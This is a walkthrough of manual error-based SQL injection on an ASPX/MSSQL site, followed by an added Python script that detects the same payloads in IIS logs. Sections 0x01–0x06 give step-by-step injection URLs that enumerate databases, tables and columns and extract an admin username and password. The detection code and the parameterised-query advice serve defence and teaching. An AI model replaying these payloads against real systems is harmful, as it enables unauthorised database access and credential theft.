Notes on a routine manual ASPX + MSSQL injection

0x01 Confirming the injection point

http://www.xxx.com/test.aspx?id=8'and+1=1+--+   page returns normally
http://www.xxx.com/test.aspx?id=8'and+1=2+--+   page returns an error

0x02 Determining the database version

http://www.xxx.com/test.aspx?id=8'and+substring((select @@version),22,4)='2008'+--+

When the compared value is 2008 the page returns normally, so we can conclude:

The database is Microsoft SQL Server 2008

0x03 Querying database names

and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=[N])+--+

dbid is the database number. dbid values 1 to 5 are used by the system, so user-created databases must start at 6; we can therefore enumerate database names:

http://www.xxx.com/test.aspx?id=8'and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=1)+--+

The first database is master. Incrementing dbid, the databases come out in turn as: tempdb, model, msdb, ReportServer$SQL2008, ReportServer$SQL2008TempDB

Continuing, some dbid values return no result; at dbid 26 the database name is: databaseA

The last dbid that returns a result is 134

http://www.xxx.com/test.aspx?id=8'and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=134)+--+

Its database name is databaseB; that shows just how many databases there are.

0x04 Querying the table names of databaseA

http://www.xxx.com/test.aspx?id=8'and 0<>(select top 1 name from databaseA.dbo.sysobjects where xtype='U')--

The first table name is wenzhang

http://www.xxx.com/test.aspx?id=8'and 0<>(select top 1 name from databaseA.dbo.sysobjects where xtype='U' and name not in('wenzhang'))--

The second table name is TF_CASE_Options; continue in the same way:

http://www.xxx.com/test.aspx?id=8'and 0<>(select top 1 name from databaseA.dbo.sysobjects where xtype='U' and name not in('wenzhang','TF_CASE_Options'))--

http://www.xxx.com/test.aspx?id=8'and 0<>(select top 1 name from databaseA.dbo.sysobjects where xtype='U' and name not in('wenzhang','TF_CASE_Options','tempTable1','Buy_Note','MF_CASE','td','Buy_List','ExamQuestion','Set_Price','Buy_Note_LinShi'))--

At this point the Users table turns up.

0x05 Querying the column names of the Users table

http://www.xxx.com/test.aspx?id=8'and 0<>(select count(*) from databaseA.dbo.sysobjects where xtype='U' and name='Users' and uid>(str(id)))+--+

This leaks the object id: 174623665

http://www.xxx.com/test.aspx?id=8'and 0<>(select top 1 name from databaseA.dbo.syscolumns where id=174623665)+--+

This gives the UserId column; continue in turn:

http://www.xxx.com/test.aspx?id=8'and 0<>(select top 1 name from databaseA.dbo.syscolumns where id=174623665 and name not in('UserId','UserName'))+--+
http://www.xxx.com/test.aspx?id=8'and 0<>(select top 1 name from databaseA.dbo.syscolumns where id=174623665 and name not in('UserId','UserName','TrueName'))+--+
http://www.xxx.com/test.aspx?id=8'and 0<>(select top 1 name from databaseA.dbo.syscolumns where id=174623665 and name not in('UserId','UserName','TrueName','Password' ))+--+

http://www.xxx.com/test.aspx?id=8'and 0<>(select top 1 name from databaseA.dbo.syscolumns where id=174623665 and name not in('UserId','UserName','TrueName','Password','IsForbidden','DepartmentId','employee_id','sfzh','sex','brithday','post','speciality','school','email','tel','ceping_name','inout','roleid','note_1','note_2','note_3','note_4','note_5','note_6','note_7','note_8','note_9'))+--+

The column names obtained in the end are:

'UserId','UserName','TrueName','Password','IsForbidden','DepartmentId','employee_id','sfzh','sex','brithday','post','speciality','school','email','tel','ceping_name','inout','roleid','note_1','note_2','note_3','note_4','note_5','note_6','note_7','note_8','note_9','note_10'

0x06 Querying administrator information

http://www.xxx.com/test.aspx?id=8'and 0<(select UserId from databaseA.dbo.Users where UserName>1)+--+

Username obtained: admin

http://www.xxx.com/test.aspx?id=8'and 0<(select UserId from databaseA.dbo.Users where Password>1 and UserName='admin')+--+

Password obtained: password
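Seen from the defender's side, every step above leaves the same small set of shapes in the IIS request log: a quote closing the id value followed by and, the @@version probe, the sysdatabases/sysobjects/syscolumns catalog views, and the -- terminator. The Python below is an added example, not part of the original post: it scans constructed IIS W3C log lines (not a real server log) for those shapes and counts flagged requests per client IP, assuming the default W3C field order; the fix for the page itself is a parameterised query instead of concatenating id into the SQL string.

```python
import re
from urllib.parse import unquote_plus

# Signals drawn from the walkthrough's payloads: a quote closing the id value
# followed by "and", the @@version probe, MSSQL catalog views, and "--".
SIGNATURES = {
    "quote_and": re.compile(r"'\s*and\b", re.I),
    "version":   re.compile(r"@@version", re.I),
    "catalog":   re.compile(r"\b(sysdatabases|sysobjects|syscolumns)\b", re.I),
    "comment":   re.compile(r"--"),
}

# Constructed sample in the default IIS W3C field order (not a real server log).
SAMPLE_LOG = """#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
2024-01-01 10:00:01 10.0.0.5 GET /test.aspx id=8 80 - 203.0.113.7 Mozilla/5.0 200
2024-01-01 10:00:02 10.0.0.5 GET /test.aspx id=8'and+1=1+--+ 80 - 203.0.113.7 Mozilla/5.0 200
2024-01-01 10:00:03 10.0.0.5 GET /test.aspx id=8'and+substring((select+@@version),22,4)='2008'+--+ 80 - 203.0.113.7 Mozilla/5.0 200
2024-01-01 10:00:04 10.0.0.5 GET /test.aspx id=8'and+0<>(select+top+1+name+from+databaseA.dbo.sysobjects+where+xtype='U')-- 80 - 203.0.113.7 Mozilla/5.0 500
"""

def decode_query(raw: str) -> str:
    # IIS stores cs-uri-query as received; decode twice to defeat double encoding.
    return unquote_plus(unquote_plus(raw))

def classify_query(raw_query: str) -> set:
    """Return the names of the signatures that match one query string."""
    q = decode_query(raw_query)
    return {name for name, rx in SIGNATURES.items() if rx.search(q)}

def scan_iis_log(lines):
    """Return (client_ip, uri_stem, matched_signatures) per flagged request.
    Assumes default W3C order: cs-uri-stem index 4, cs-uri-query 5, c-ip 8."""
    findings = []
    for line in lines:
        if not line.strip() or line.startswith("#"):
            continue                      # skip blank lines and directives
        fields = line.split()
        if len(fields) < 9:
            continue                      # truncated or non-default layout
        hits = classify_query(fields[5])
        if hits:
            findings.append((fields[8], fields[4], hits))
    return findings

def summarize_by_client(findings):
    """Count flagged requests per client IP; a climbing count is enumeration."""
    counts = {}
    for client, _, _ in findings:
        counts[client] = counts.get(client, 0) + 1
    return counts
```

A single hit on "comment" alone is weak evidence; alert on requests that combine two or more signatures, or on one client accumulating many hits as in the sample.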

The end.
